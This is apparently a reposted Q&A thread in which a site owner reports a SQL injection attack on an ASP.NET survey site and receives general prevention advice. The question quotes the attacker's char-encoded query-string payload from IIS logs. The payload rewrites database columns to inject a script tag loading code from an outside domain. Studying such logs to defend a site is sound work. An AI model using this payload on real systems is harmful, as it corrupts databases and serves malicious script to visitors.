Question
We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site: http://stackoverflow.com/questions/3775964/xss-attack-on-the-asp-net-website.
I found multiple entries in our IIS logs that included the malicious code:
</TITLE><SCRIPT SRC=http://google-stats49.info/ur.php>
Here is an example of the value of the cs-uri-query field for one of the IIS log entries.
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.
Does anyone have any suggestions on how to prevent this from happening?
Recommended answer
That's a SQL injection.
- Never trust user input. You are taking the input and passing it straight to the database.
- Never trust your users' input!
- Check all input against a whitelist of allowed values.
- For text input, make sure everything is escaped.
There is a ton written about this subject: Google is your friend: http://www.google.com/search?q=preventing+SQL+injection&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla%3aen-US%3aofficial&client=firefox-a
This concludes the article on the attack on an ASP website that uses a SQL Server database; we hope the recommended answer is helpful.